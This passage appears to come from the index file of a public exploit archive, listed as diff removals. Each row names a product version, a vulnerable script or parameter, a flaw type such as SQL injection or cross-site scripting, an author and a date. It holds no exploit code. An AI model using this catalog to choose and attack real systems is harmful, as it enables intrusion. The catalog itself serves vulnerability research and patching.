-30982,exploits/php/webapps/30982.html,"Nucleus CMS 3.0.1 - 'myid' SQL Injection",2008-01-03,MustLive,php,webapps, -30983,exploits/php/webapps/30983.txt,"ExpressionEngine 1.2.1 - HTTP Response Splitting / Cross-Site Scripting",2008-01-03,MustLive,php,webapps, -30984,exploits/php/webapps/30984.txt,"eTicket 1.5.5 - 'newticket.php' Multiple Cross-Site Scripting Vulnerabilities",2007-01-03,"Omer Singer",php,webapps, -31083,exploits/php/webapps/31083.txt,"Nilson's Blogger 0.11 - 'comments.php' Local File Inclusion",2008-01-31,muuratsalo,php,webapps, -30987,exploits/php/webapps/30987.txt,"NetRisk 1.9.7 - 'index.php' Remote File Inclusion",2008-01-04,S.W.A.T.,php,webapps, -30988,exploits/php/webapps/30988.txt,"Rotabanner Local 2/3 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2008-01-03,MustLive,php,webapps, -30992,exploits/php/webapps/30992.txt,"Strawberry 1.1.1 - 'html.php' Remote Code Execution",2008-01-07,"Eugene Minaev",php,webapps, -30993,exploits/asp/webapps/30993.txt,"Snitz Forums 2000 3.4.5/3.4.6 - Multiple Cross-Site Scripting Vulnerabilities",2008-01-07,Doz,asp,webapps, -30994,exploits/php/webapps/30994.html,"eTicket 1.5.5.2 - 'admin.php' Cross-Site Request Forgery",2008-01-07,L4teral,php,webapps, -30995,exploits/php/webapps/30995.txt,"eTicket 1.5.5.2 - 'view.php?s' Cross-Site Scripting",2008-01-07,L4teral,php,webapps, -30996,exploits/php/webapps/30996.txt,"eTicket 1.5.5.2 - 'search.php' Multiple SQL Injections",2008-01-07,L4teral,php,webapps, -30997,exploits/php/webapps/30997.txt,"eTicket 1.5.5.2 - 'admin.php' Multiple SQL Injections",2008-01-07,L4teral,php,webapps, -31000,exploits/php/webapps/31000.txt,"SysHotel On Line System - 'index.php' Local File Inclusion",2008-01-08,p4imi0,php,webapps, -31001,exploits/php/webapps/31001.txt,"IceWarp Mail Server 9.1.1 - '/admin/index.html' Cross-Site Scripting",2008-01-08,Ekin0x,php,webapps, -31003,exploits/php/webapps/31003.txt,"Omegasoft Insel 7 - Authentication Bypass / User Enumeration",2008-01-09,MC.Iglo,php,webapps, -31004,exploits/jsp/webapps/31004.txt,"Sun Java System Identity Manager 6.0/7.0/7.1 - '/idm/login.jsp' Multiple Cross-Site Scripting Vulnerabilities",2008-01-09,"Jan Fry & Adrian Pastor",jsp,webapps, -31005,exploits/jsp/webapps/31005.txt,"Sun Java System Identity Manager 6.0/7.0/7.1 - '/idm/account/findForSelect.jsp?resultsForm' Cross-Site Scripting",2008-01-09,"Jan Fry & Adrian Pastor",jsp,webapps, -31006,exploits/jsp/webapps/31006.txt,"Sun Java System Identity Manager 6.0/7.0/7.1 - '/idm/help/index.jsp?helpUrl' Remote Frame Injection",2008-01-09,"Jan Fry & Adrian Pastor",jsp,webapps, -31007,exploits/jsp/webapps/31007.txt,"Sun Java System Identity Manager 6.0/7.0/7.1 - '/idm/user/main.jsp?activeControl' Cross-Site Scripting",2008-01-09,"Jan Fry & Adrian Pastor",jsp,webapps, -31008,exploits/php/webapps/31008.txt,"Joomla! Component SMF Forum 1.1.4 - Multiple Cross-Site Scripting Vulnerabilities",2008-01-09,Doz,php,webapps, -31009,exploits/php/webapps/31009.txt,"ID-Commerce 2.0 - 'liste.php' SQL Injection",2008-01-10,consultant.securite,php,webapps, -31011,exploits/php/webapps/31011.txt,"Members Area System 1.7 - 'view_func.php' Remote File Inclusion",2008-01-11,ShipNX,php,webapps, -31082,exploits/php/webapps/31082.txt,"Liferay Enterprise Portal 4.3.6 - User-Agent HTTP Header Cross-Site Scripting",2008-01-31,"Tomasz Kuczynski",php,webapps, -31015,exploits/php/webapps/31015.txt,"BloofoxCMS 0.5.0 - Multiple Vulnerabilities",2014-01-17,AtT4CKxT3rR0r1ST,php,webapps,80 -31017,exploits/asp/webapps/31017.php,"SmarterMail Enterprise and Standard 11.x - Persistent Cross-Site Scripting",2014-01-17,"Saeed reza Zamanian",asp,webapps,80 -31020,exploits/php/webapps/31020.txt,"Moodle 1.8.3 - 'install.php' Cross-Site Scripting",2008-01-12,"Hanno Bock",php,webapps, -31022,exploits/php/webapps/31022.txt,"PHP Running Management 1.0.2 - 'index.php' Cross-Site Scripting",2008-01-13,"Christophe VG",php,webapps, -31034,exploits/php/webapps/31034.txt,"MyBB 1.2.10 - 'moderation.php' Multiple SQL Injections",2008-01-16,waraxe,php,webapps, -31035,exploits/php/webapps/31035.txt,"Clever Copy 3.0 - Multiple SQL Injections / Cross-Site Scripting Vulnerabilities",2008-01-17,hadihadi,php,webapps, -31037,exploits/php/webapps/31037.txt,"phpAutoVideo 2.21 - 'sidebar.php?loadpage' Remote File Inclusion",2008-01-18,"H-T Team",php,webapps, -31038,exploits/php/webapps/31038.txt,"phpAutoVideo 2.21 - 'index.php?cat' Cross-Site Scripting",2008-01-18,"H-T Team",php,webapps, -31041,exploits/php/webapps/31041.txt,"BloofoxCMS 0.3 - Multiple Input Validation Vulnerabilities",2008-01-20,AmnPardaz,php,webapps, -31042,exploits/asp/webapps/31042.txt,"MegaBBS 1.5.14b - 'upload.asp' Cross-Site Scripting",2008-01-21,Doz,asp,webapps, -31043,exploits/cgi/webapps/31043.txt,"Alice Gate2 Plus Wi-Fi Router - Cross-Site Request Forgery",2008-01-21,WarGame,cgi,webapps, -31044,exploits/php/webapps/31044.txt,"Singapore 0.10.1 Modern Template - 'gallery' Cross-Site Scripting",2008-01-21,trew,php,webapps, -31045,exploits/php/webapps/31045.txt,"Small Axe Weblog 0.3.1 - 'ffile' Remote File Inclusion",2008-01-21,anonymous,php,webapps, -31048,exploits/php/webapps/31048.txt,"PacerCMS 0.6 - 'id' Multiple SQL Injections",2008-01-22,RawSecurity.org,php,webapps, -31049,exploits/php/webapps/31049.txt,"DeluxeBB 1.1 - 'attachments_header.php' Cross-Site Scripting",2008-01-22,NBBN,php,webapps, -31055,exploits/asp/webapps/31055.txt,"Web Wiz (Multiple Products) - Remote Information Disclosure",2008-01-23,AmnPardaz,asp,webapps, -31058,exploits/asp/webapps/31058.txt,"Pre Hotel and Resorts - 'user_login.asp' Multiple SQL Injection Vulnerabilities",2008-01-25,milad_sa2007,asp,webapps, -31059,exploits/asp/webapps/31059.txt,"E-Smart Cart - 'Members Login' Multiple SQL Injection Vulnerabilities",2008-01-25,milad_sa2007,asp,webapps, -31061,exploits/php/webapps/31061.txt,"Fonality trixbox 2.4.2 - Cross-Site Scripting (1)",2008-01-25,"Omer Singer",php,webapps, -31062,exploits/php/webapps/31062.txt,"Fonality trixbox 2.4.2 - Cross-Site Scripting (2)",2008-01-25,"Omer Singer",php,webapps, -31063,exploits/php/webapps/31063.txt,"WebCalendar 1.1.6 - 'pref.php' Cross-Site Scripting",2008-01-25,"Omer Singer",php,webapps, -31064,exploits/php/webapps/31064.txt,"WebCalendar 1.1.6 - 'search.php' Cross-Site Scripting",2008-01-25,"Omer Singer",php,webapps, -31065,exploits/php/webapps/31065.txt,"F5 BIG-IP Application Security Manager 9.4.3 - 'report_type' Cross-Site Scripting",2008-01-26,nnposter,php,webapps, -31066,exploits/php/webapps/31066.txt,"Mambo Module MOStlyCE 2.4 - 'connector.php' Cross-Site Scripting",2008-01-28,AmnPardaz,php,webapps, -31067,exploits/php/webapps/31067.txt,"ClanSphere 2007.4.4 - 'install.php' Local File Inclusion",2008-01-28,p4imi0,php,webapps, -31068,exploits/php/webapps/31068.txt,"Mambo Module MOStlyCE 2.4 Image Manager Utility - Arbitrary File Upload",2008-01-28,AmnPardaz,php,webapps, -31069,exploits/php/webapps/31069.txt,"eTicket 1.5.6-RC4 - 'index.php' Cross-Site Scripting",2008-01-28,jekil,php,webapps, -31070,exploits/asp/webapps/31070.txt,"ASPired2Protect Login Page - SQL Injection",2008-01-28,T_L_O_T_D,asp,webapps, -31071,exploits/cgi/webapps/31071.txt,"VB Marketing - 'tseekdir.cgi' Local File Inclusion",2008-01-28,"Sw33t h4cK3r",cgi,webapps, -31073,exploits/java/webapps/31073.html,"SunGard Banner Student 7.3 - 'add1' Cross-Site Scripting",2008-01-29,"Brendan M. Hickey",java,webapps, -31074,exploits/php/webapps/31074.txt,"Nucleus CMS 3.22 - 'action.php' Cross-Site Scripting",2008-01-20,"Alexandr Polyakov",php,webapps, -31075,exploits/php/webapps/31075.txt,"AmpJuke 0.7 - 'index.php' Cross-Site Scripting",2008-01-29,ShaFuck31,php,webapps, -31077,exploits/php/webapps/31077.txt,"Joomla! / Mambo Component com_buslicense - 'aid' SQL Injection",2008-01-30,S@BUN,php,webapps, -31079,exploits/php/webapps/31079.txt,"webSPELL 4.1.2 - 'whoisonline.php' Cross-Site Scripting",2008-01-30,NBBN,php,webapps, -31080,exploits/php/webapps/31080.txt,"YeSiL KoRiDoR Ziyaretçi Defteri - 'index.php' SQL Injection",2008-01-30,ShaFuck31,php,webapps, -31081,exploits/cgi/webapps/31081.txt,"OpenBSD 4.1 - bgplg 'cmd' Cross-Site Scripting",2007-10-10,"Anton Karpov",cgi,webapps, -31084,exploits/php/webapps/31084.txt,"Archimede Net 2000 - 'E-Guest_show.php' SQL Injection",2008-02-01,"Sw33t h4cK3r",php,webapps, -31085,exploits/php/webapps/31085.txt,"Doodle4Gift - Multiple Vulnerabilities",2014-01-20,Dr.NaNo,php,webapps,80 -31086,exploits/php/webapps/31086.php,"AfterLogic Pro and Lite 7.1.1.1 - Persistent Cross-Site Scripting",2014-01-20,"Saeed reza Zamanian",php,webapps,80 -31087,exploits/hardware/webapps/31087.txt,"Teracom Modem T2-B-Gawv1.4U10Y-BI - Persistent Cross-Site Scripting",2014-01-20,"Rakesh S",hardware,webapps,80 -31088,exploits/hardware/webapps/31088.py,"BLUE COM Router 5360/52018 - Password Reset",2014-01-20,KAI,hardware,webapps,80 -31091,exploits/php/webapps/31091.txt,"Domain Trader 2.0 - 'catalog.php' Cross-Site Scripting",2008-02-02,Crackers_Child,php,webapps, -31092,exploits/php/webapps/31092.txt,"WordPress Plugin WP-Footnotes 2.2 - Multiple Remote Vulnerabilities",2008-02-02,NBBN,php,webapps, -31093,exploits/php/webapps/31093.txt,"ITechClassifieds - 'viewcat.php?CatID' SQL Injection",2008-02-02,Crackers_Child,php,webapps, -31094,exploits/php/webapps/31094.txt,"ITechClassifieds - 'viewcat.php?CatID' Cross-Site Scripting",2008-02-02,Crackers_Child,php,webapps, -31096,exploits/php/webapps/31096.txt,"WordPress Plugin ShiftThis NewsLetter - SQL Injection",2008-02-03,S@BUN,php,webapps, -31097,exploits/php/webapps/31097.txt,"CruxCMS 3.0 - 'search.php' Cross-Site Scripting",2008-02-04,Psiczn,php,webapps, -31098,exploits/php/webapps/31098.txt,"Simple OS CMS 0.1c_beta - 'login.php' SQL Injection",2008-02-04,Psiczn,php,webapps, -31099,exploits/php/webapps/31099.txt,"Codice CMS - 'login.php' SQL Injection",2008-02-04,Psiczn,php,webapps, -31101,exploits/php/webapps/31101.txt,"HispaH YouTube Clone - 'load_message.php' Cross-Site Scripting",2008-02-04,Smasher,php,webapps, -31103,exploits/asp/webapps/31103.txt,"AstroSoft HelpDesk - '/operator/article/article_search_results.asp?txtSearch' Cross-Site Scripting",2008-02-04,"Alexandr Polyakov",asp,webapps, -31104,exploits/asp/webapps/31104.txt,"AstroSoft HelpDesk - '/operator/article/article_attachment.asp?Attach_Id' Cross-Site Scripting",2008-02-04,"Alexandr Polyakov",asp,webapps, -31107,exploits/php/webapps/31107.txt,"Portail Web PHP 2.5.1 - 'conf-activation.php' Remote File Inclusion",2008-02-04,Psiczn,php,webapps, -31108,exploits/php/webapps/31108.txt,"Portail Web PHP 2.5.1 - 'item.php' Remote File Inclusion",2008-02-04,Psiczn,php,webapps, -31109,exploits/php/webapps/31109.txt,"Portail Web PHP 2.5.1 - 'conf_modules.php' Remote File Inclusion",2008-02-04,Psiczn,php,webapps, -31110,exploits/php/webapps/31110.txt,"Portail Web PHP 2.5.1 - 'login.php' Remote File Inclusion",2008-02-04,Psiczn,php,webapps, -31111,exploits/php/webapps/31111.txt,"Download Management 1.00 for PHP-Fusion - Multiple Local File Inclusions",2008-02-05,Psiczn,php,webapps, -31112,exploits/php/webapps/31112.txt,"DevTracker Module For bcoos 1.1.11 and E-xoops 1.0.8 - Multiple Cross-Site Scripting Vulnerabilities",2008-02-04,Lostmon,php,webapps, -31115,exploits/php/webapps/31115.txt,"MyNews 1.6.x - 'hash' Cross-Site Scripting",2008-02-06,SkyOut,php,webapps, -31116,exploits/php/webapps/31116.txt,"Pagetool 1.07 - 'search_term' Cross-Site Scripting",2008-02-06,Phanter-Root,php,webapps, -31117,exploits/asp/webapps/31117.txt,"Ipswitch WS_FTP Server 6 - '/WSFTPSVR/FTPLogServer/LogViewer.asp' Authentication Bypass",2008-02-06,"Luigi Auriemma",asp,webapps, -31120,exploits/php/webapps/31120.txt,"MODx 0.9.6 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2008-02-07,"Alexandr Polyakov",php,webapps, -31121,exploits/php/webapps/31121.txt,"Joomla! / Mambo Component com_sermon 0.2 - 'gid' SQL Injection",2008-02-07,S@BUN,php,webapps, -31124,exploits/php/webapps/31124.txt,"Calimero.CMS 3.3 - 'id' Cross-Site Scripting",2008-02-08,Psiczn,php,webapps, -31125,exploits/php/webapps/31125.txt,"Joovili 2.1 - 'members_help.php' Remote File Inclusion",2008-02-08,Cr@zy_King,php,webapps, -31126,exploits/php/webapps/31126.txt,"S9Y Serendipity Freetag-plugin 2.95 - 'style' Cross-Site Scripting",2008-02-08,"Alexander Brachmann",php,webapps, -31129,exploits/php/webapps/31129.txt,"Managed Workplace Service Center 4.x/5.x/6.x - Installation Information Disclosure",2008-02-08,"Brook Powers",php,webapps, -31131,exploits/php/webapps/31131.txt,"PK-Designs PKs Movie Database 3.0.3 - '/index.php' SQL Injection / Cross-Site Scripting",2008-02-09,Houssamix,php,webapps, -31134,exploits/php/webapps/31134.txt,"VWar 1.5 - 'calendar.php' SQL Injection",2008-02-11,Pouya_Server,php,webapps, -31135,exploits/php/webapps/31135.txt,"Rapid-Source Rapid-Recipe Component - Multiple SQL Injections",2008-02-11,breaker_unit,php,webapps, -31137,exploits/php/webapps/31137.txt,"Joomla! / Mambo Component com_comments 0.5.8.5g - 'id' SQL Injection",2008-02-11,CheebaHawk215,php,webapps, -31140,exploits/php/webapps/31140.txt,"iTechClassifieds 3.03.057 - SQL Injection",2014-01-23,vinicius777,php,webapps, -31141,exploits/php/webapps/31141.txt,"godontologico 5 - SQL Injection",2014-01-23,vinicius777,php,webapps, -31142,exploits/php/webapps/31142.txt,"Simple E-document 1.31 - Authentication Bypass",2014-01-23,vinicius777,php,webapps, -31143,exploits/php/webapps/31143.txt,"PizzaInn_Project - SQL Injection",2014-01-23,vinicius777,php,webapps, -31144,exploits/php/webapps/31144.txt,"mySeatXT 0.2134 - SQL Injection",2014-01-23,vinicius777,php,webapps, -31145,exploits/php/webapps/31145.txt,"Easy POS System - 'login.php' SQL Injection",2014-01-23,vinicius777,php,webapps, -31146,exploits/php/webapps/31146.txt,"Cells Blog 3.3 - Reflected Cross-Site Scripting / Blind SQLite Injection",2014-01-23,vinicius777,php,webapps, -31147,exploits/php/webapps/31147.txt,"Adult WebMaster PHP - Password Disclosure",2014-01-23,vinicius777,php,webapps, -31154,exploits/php/webapps/31154.txt,"Counter Strike Portals - 'download' SQL Injection",2008-02-12,S@BUN,php,webapps, -31155,exploits/php/webapps/31155.txt,"Joomla! / Mambo Component com_iomezun - 'id' SQL Injection",2008-02-12,S@BUN,php,webapps, -31156,exploits/php/webapps/31156.txt,"Cacti 0.8.7 - 'graph_view.php?graph_list' SQL Injection",2008-02-12,aScii,php,webapps, -31157,exploits/php/webapps/31157.txt,"Cacti 0.8.7 - 'graph.php?view_type' Cross-Site Scripting",2008-02-12,aScii,php,webapps, -31158,exploits/php/webapps/31158.txt,"Cacti 0.8.7 - 'graph_view.php?filter' Cross-Site Scripting",2008-02-12,aScii,php,webapps, -31159,exploits/php/webapps/31159.txt,"Cacti 0.8.7 - 'tree.php' Multiple SQL Injections",2008-02-12,aScii,php,webapps, -31160,exploits/php/webapps/31160.txt,"Cacti 0.8.7 - 'graph_xport.php?local_graph_id' SQL Injection",2008-02-12,aScii,php,webapps, -31161,exploits/php/webapps/31161.txt,"Cacti 0.8.7 - '/index.php/sql.php?Login Action login_username' SQL Injection",2008-02-12,aScii,php,webapps, -31162,exploits/php/webapps/31162.txt,"okul siteleri 'com_mezun' Component - SQL Injection",2008-02-12,S@BUN,php,webapps, -31164,exploits/php/webapps/31164.txt,"Prince Clan Chess Club 0.8 com_pcchess Component - 'user_id' SQL Injection",2008-02-12,S@BUN,php,webapps, -31258,exploits/ios/webapps/31258.txt,"SimplyShare 1.4 iOS - Multiple Vulnerabilities",2014-01-29,Vulnerability-Lab,ios,webapps, -31335,exploits/php/webapps/31335.txt,"MG2 - 'list' Cross-Site Scripting",2008-03-04,"Jose Carlos Norte",php,webapps, -40357,exploits/hardware/webapps/40357.py,"Vodafone Mobile Wifi - Reset Admin Password",2016-09-09,"Daniele Linguaglossa",hardware,webapps,80 -31700,exploits/php/webapps/31700.txt,"e107 CMS 0.7 - Multiple Cross-Site Scripting Vulnerabilities",2008-04-24,ZoRLu,php,webapps, -31701,exploits/php/webapps/31701.txt,"Digital Hive 2.0 - 'base.php' Cross-Site Scripting",2008-04-24,ZoRLu,php,webapps, -31173,exploits/php/webapps/31173.txt,"pChart 2.1.3 - Multiple Vulnerabilities",2014-01-24,"Balazs Makany",php,webapps,80 -31174,exploits/php/webapps/31174.txt,"Joomla! Component Komento 1.7.2 - Persistent Cross-Site Scripting",2014-01-24,"High-Tech Bridge SA",php,webapps,80 -31175,exploits/php/webapps/31175.txt,"Joomla! Component JV Comment 3.0.2 - 'id' SQL Injection",2014-01-24,"High-Tech Bridge SA",php,webapps,80 -31180,exploits/hardware/webapps/31180.txt,"Franklin Fueling TS-550 evo 2.0.0.6833 - Multiple Vulnerabilities",2014-01-24,"Trustwave's SpiderLabs",hardware,webapps,10001 -31183,exploits/php/webapps/31183.txt,"Skybluecanvas CMS 1.1 r248-03 - Remote Command Execution",2014-01-24,"Scott Parish",php,webapps,80 -31272,exploits/php/webapps/31272.txt,"Joomla! / Mambo Component com_Joomlavvz - 'id' SQL Injection",2008-02-20,S@BUN,php,webapps, -31273,exploits/php/webapps/31273.txt,"Joomla! / Mambo Component com_most - 'secid' SQL Injection",2008-02-21,S@BUN,php,webapps, -31274,exploits/php/webapps/31274.txt,"Joomla! / Mambo Component com_asortyment - 'katid' SQL Injection",2008-02-21,S@BUN,php,webapps, -31269,exploits/php/webapps/31269.txt,"Spyce 2.1.3 - '/spyce/examples/formtag.spy' Multiple Cross-Site Scripting Vulnerabilities",2007-02-19,"Richard Brain",php,webapps, -31270,exploits/php/webapps/31270.txt,"Spyce 2.1.3 - spyce/examples/automaton.spy Direct Request Error Message Information Disclosure",2007-02-19,"Richard Brain",php,webapps, -31265,exploits/php/webapps/31265.txt,"Spyce 2.1.3 - '/docs/examples/redirect.spy' Multiple Cross-Site Scripting Vulnerabilities",2007-02-19,"Richard Brain",php,webapps, -31266,exploits/php/webapps/31266.txt,"Spyce 2.1.3 - 'docs/examples/handlervalidate.spy?x' Cross-Site Scripting",2007-02-19,"Richard Brain",php,webapps, -31267,exploits/php/webapps/31267.txt,"Spyce 2.1.3 - 'spyce/examples/request.spy?name' Cross-Site Scripting",2007-02-19,"Richard Brain",php,webapps, -31268,exploits/php/webapps/31268.txt,"Spyce 2.1.3 - 'spyce/examples/getpost.spy?Name' Cross-Site Scripting",2007-02-19,"Richard Brain",php,webapps, -31189,exploits/java/webapps/31189.txt,"Cisco Unified Communications Manager 6.1 - 'key' SQL Injection",2008-02-13,"Nico Leidecker",java,webapps, -31191,exploits/asp/webapps/31191.txt,"Site2Nite Real Estate Web - 'agentlist.asp' Multiple SQL Injections",2008-02-13,S@BUN,asp,webapps, -31192,exploits/php/webapps/31192.txt,"Joomla! / Mambo Component com_model - 'objid' SQL Injection",2008-02-13,S@BUN,php,webapps, -31193,exploits/php/webapps/31193.txt,"Joomla! / Mambo Component com_omnirealestate - 'objid' SQL Injection",2008-02-13,S@BUN,php,webapps, -31194,exploits/php/webapps/31194.txt,"Dokeos 1.8.4 - 'whoisonline.php?id' SQL Injection",2008-02-15,"Alexandr Polyakov",php,webapps, -31195,exploits/php/webapps/31195.txt,"Dokeos 1.8.4 - 'main/inc/lib/events.lib.inc.php' Referer HTTP Header SQL Injection",2008-02-15,"Alexandr Polyakov",php,webapps, -31196,exploits/php/webapps/31196.txt,"Dokeos 1.8.4 - '/main/calendar/myagenda.php?courseCode' Cross-Site Scripting",2008-02-15,"Alexandr Polyakov",php,webapps, -31197,exploits/php/webapps/31197.txt,"Dokeos 1.8.4 - '/main/admin/course_category.php?category' Cross-Site Scripting",2008-02-15,"Alexandr Polyakov",php,webapps, -31198,exploits/php/webapps/31198.txt,"Dokeos 1.8.4 - '/main/admin/session_list.php?cmessage' Cross-Site Scripting",2008-02-15,"Alexandr Polyakov",php,webapps, -31199,exploits/php/webapps/31199.txt,"Dokeos 1.8.4 - '/main/mySpace/index.php?tracking_list_coaches_column' SQL Injection",2008-02-15,"Alexandr Polyakov",php,webapps, -31200,exploits/php/webapps/31200.txt,"Dokeos 1.8.4 - '/main/create_course/add_course.php?tutor_name' SQL Injection",2008-02-15,"Alexandr Polyakov",php,webapps, -31201,exploits/php/webapps/31201.txt,"artmedic webdesign weblog - Multiple Local File Inclusions",2008-02-14,muuratsalo,php,webapps, -31202,exploits/php/webapps/31202.txt,"PlutoStatus Locator 1.0pre alpha - 'index.php' Local File Inclusion",2008-02-14,muuratsalo,php,webapps, -31206,exploits/php/webapps/31206.txt,"Joomla! / Mambo Component com_smslist - 'listid' SQL Injection",2008-02-15,S@BUN,php,webapps, -31207,exploits/php/webapps/31207.txt,"Joomla! / Mambo Component com_activities - 'id' SQL Injection",2008-02-15,S@BUN,php,webapps, -31208,exploits/php/webapps/31208.txt,"Joomla! / Mambo Component com_sg - 'pid' SQL Injection",2008-02-15,S@BUN,php,webapps, -31209,exploits/php/webapps/31209.txt,"Joomla! / Mambo Component faq - 'catid' SQL Injection",2008-02-15,S@BUN,php,webapps, -31210,exploits/php/webapps/31210.txt,"Yellow Swordfish Simple Forum 1.10/1.11 - 'topic' SQL Injection",2008-02-15,S@BUN,php,webapps, -31211,exploits/php/webapps/31211.txt,"Yellow Swordfish Simple Forum 1.7/1.9 - 'index.php' SQL Injection",2008-02-15,S@BUN,php,webapps, -31212,exploits/php/webapps/31212.txt,"Yellow Swordfish Simple Forum 1.x - 'topic' SQL Injection",2008-02-15,S@BUN,php,webapps, -31213,exploits/php/webapps/31213.txt,"Joomla! / Mambo Component com_salesrep - 'rid' SQL Injection",2008-02-15,S@BUN,php,webapps, -31214,exploits/php/webapps/31214.txt,"Joomla! / Mambo Component com_lexikon - 'id' SQL Injection",2008-02-16,S@BUN,php,webapps, -31215,exploits/php/webapps/31215.txt,"Joomla! / Mambo Component Filebase - 'filecatid' SQL Injection",2008-02-16,S@BUN,php,webapps, -31216,exploits/php/webapps/31216.txt,"Joomla! / Mambo Component com_scheduling - 'id' SQL Injection",2008-02-15,S@BUN,php,webapps, -31217,exploits/php/webapps/31217.txt,"BanPro Dms 1.0 - 'index.php' Local File Inclusion",2008-02-16,muuratsalo,php,webapps, -32241,exploits/php/webapps/32241.txt,"PHP Realty - 'dpage.php' SQL Injection",2008-08-13,CraCkEr,php,webapps, -32242,exploits/php/webapps/32242.txt,"PHP-Fusion 4.01 - 'readmore.php' SQL Injection",2008-08-13,Rake,php,webapps, -32243,exploits/php/webapps/32243.txt,"Nukeviet 2.0 - '/admin/login.php' Cookie Authentication Bypass",2008-08-13,Ciph3r,php,webapps, -32244,exploits/php/webapps/32244.txt,"YapBB 1.2 - 'class_yapbbcooker.php' Remote File Inclusion",2008-08-13,CraCkEr,php,webapps, -32245,exploits/php/webapps/32245.txt,"Nortel Networks SRG V16 - 'modules.php?module' Cross-Site Scripting",2008-08-13,CraCkEr,php,webapps, -32246,exploits/php/webapps/32246.txt,"Nortel Networks SRG V16 - 'admin_modules.php?module' Traversal Local File Inclusion",2008-08-13,CraCkEr,php,webapps, -32247,exploits/php/webapps/32247.txt,"Nortel Networks SRG V16 - 'modules.php?module' Traversal Local File Inclusion",2008-08-13,CraCkEr,php,webapps, -31221,exploits/windows/webapps/31221.txt,"Ability Mail Server 2013 -Persistent Cross-Site Scripting / Cross-Site Request Forgery (Password Reset)",2014-01-27,"David Um",windows,webapps, -31224,exploits/php/webapps/31224.txt,"Joomla! / Mambo Component com_profile - 'oid' SQL Injection",2008-02-19,S@BUN,php,webapps, -31225,exploits/php/webapps/31225.html,"RunCMS 1.6.1 - 'admin.php' Cross-Site Scripting",2008-02-18,NBBN,php,webapps, -31226,exploits/php/webapps/31226.txt,"Joomla! / Mambo Component com_detail - 'id' SQL Injection",2008-02-18,S@BUN,php,webapps, -31227,exploits/php/webapps/31227.txt,"Yellow Swordfish Simple Forum 1.x - 'sf-profile.php' SQL Injection",2008-02-18,S@BUN,php,webapps, -31228,exploits/php/webapps/31228.txt,"WordPress Plugin Recipes Blog - 'id' SQL Injection",2008-02-18,S@BUN,php,webapps, -31229,exploits/php/webapps/31229.txt,"ProjectPier 0.8 - Multiple HTML Injection / Cross-Site Scripting Vulnerabilities",2008-02-18,L4teral,php,webapps, -31230,exploits/php/webapps/31230.txt,"WordPress Plugin wp-people 2.0 - 'wp-people-popup.php' SQL Injection",2008-02-18,S@BUN,php,webapps, -31233,exploits/multiple/webapps/31233.txt,"WebcamXP 3.72.440/4.05.280 Beta - '/pocketpc?camnum' Arbitrary Memory Disclosure",2008-02-18,"Luigi Auriemma",multiple,webapps, -31234,exploits/multiple/webapps/31234.txt,"WebcamXP 3.72.440/4.05.280 Beta - '/show_gallery_pic?id' Arbitrary Memory Disclosure",2008-02-18,"Luigi Auriemma",multiple,webapps, -31235,exploits/php/webapps/31235.txt,"Jinzora 2.7.5 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2008-02-19,"Alexandr Polyakov",php,webapps, -31236,exploits/php/webapps/31236.txt,"Jinzora 2.7.5 - 'ajax_request.php' Multiple Cross-Site Scripting Vulnerabilities",2008-02-19,"Alexandr Polyakov",php,webapps, -31237,exploits/php/webapps/31237.txt,"Jinzora 2.7.5 - 'slim.php' Multiple Cross-Site Scripting Vulnerabilities",2008-02-19,"Alexandr Polyakov",php,webapps, -31238,exploits/php/webapps/31238.txt,"Jinzora 2.7.5 - 'popup.php' Multiple Cross-Site Scripting Vulnerabilities",2008-02-19,"Alexandr Polyakov",php,webapps, -31239,exploits/php/webapps/31239.txt,"Google Hack Honeypot File Upload Manager 1.3 - 'delall' Unauthorized File Access",2008-02-19,Mr-m07,php,webapps, -31240,exploits/php/webapps/31240.txt,"SmarterTools SmarterMail 4.3 - 'Subject' HTML Injection",2008-02-19,"Juan Pablo Lopez Yacubian",php,webapps, -31241,exploits/php/webapps/31241.txt,"PHP-Nuke Sections Module - 'artid' SQL Injection",2008-02-19,S@BUN,php,webapps, -31242,exploits/php/webapps/31242.txt,"Facile Forms 1.x - 'catid' SQL Injection",2008-02-19,S@BUN,php,webapps, -31243,exploits/php/webapps/31243.txt,"Joomla! / Mambo Component com_team - SQL Injection",2008-02-19,S@BUN,php,webapps, -31244,exploits/php/webapps/31244.txt,"Joomla! / Mambo Component com_iigcatalog - 'cat' SQL Injection",2008-02-19,S@BUN,php,webapps, -31245,exploits/php/webapps/31245.txt,"Joomla! / Mambo Component com_formtool - 'catid' SQL Injection",2008-02-19,S@BUN,php,webapps, -31246,exploits/php/webapps/31246.txt,"Joomla! / Mambo Component com_genealogy - 'id' SQL Injection",2008-02-19,S@BUN,php,webapps, -31247,exploits/php/webapps/31247.txt,"Joomla! Component iJoomla! com_magazine - 'pageid' SQL Injection",2008-02-19,S@BUN,php,webapps, -31248,exploits/php/webapps/31248.txt,"XOOPS 'vacatures' Module - 'cid' SQL Injection",2008-02-19,S@BUN,php,webapps, -31249,exploits/php/webapps/31249.txt,"XOOPS 'events' Module - 'id' SQL Injection",2008-02-19,S@BUN,php,webapps, -31250,exploits/php/webapps/31250.txt,"XOOPS 'seminars' Module - 'id' SQL Injection",2008-02-19,S@BUN,php,webapps, -31251,exploits/php/webapps/31251.txt,"XOOPS 'badliege' Module - 'id' SQL Injection",2008-02-19,S@BUN,php,webapps, -31252,exploits/php/webapps/31252.txt,"PHP-Nuke Web_Links Module - 'cid' SQL Injection",2008-02-19,S@BUN,php,webapps, -31256,exploits/php/webapps/31256.txt,"LinPHA 1.3.4 - Multiple Vulnerabilities",2014-01-29,killall-9,php,webapps,80 -31331,exploits/php/webapps/31331.txt,"PHP-Nuke eGallery 3.0 Module - 'pid' SQL Injection",2008-03-04,"Aria-Security Team",php,webapps, -31332,exploits/php/webapps/31332.txt,"PHP-Nuke 'Seminars' Module - 'Filename' Local File Inclusion",2008-03-04,The-0utl4w,php,webapps, -31528,exploits/php/webapps/31528.txt,"Le Forum - 'Fichier_Acceuil' Remote File Inclusion",2008-03-24,ZoRLu,php,webapps, -31261,exploits/hardware/webapps/31261.txt,"A10 Networks Loadbalancer - Directory Traversal",2014-01-29,xistence,hardware,webapps,443 -31262,exploits/php/webapps/31262.txt,"ManageEngine Support Center Plus 7916 - Directory Traversal",2014-01-29,xistence,php,webapps,80 -31263,exploits/php/webapps/31263.txt,"pfSense 2.1 build 20130911-1816 - Directory Traversal",2014-01-29,@u0x,php,webapps, -31275,exploits/asp/webapps/31275.txt,"Eagle Software Aeries Student 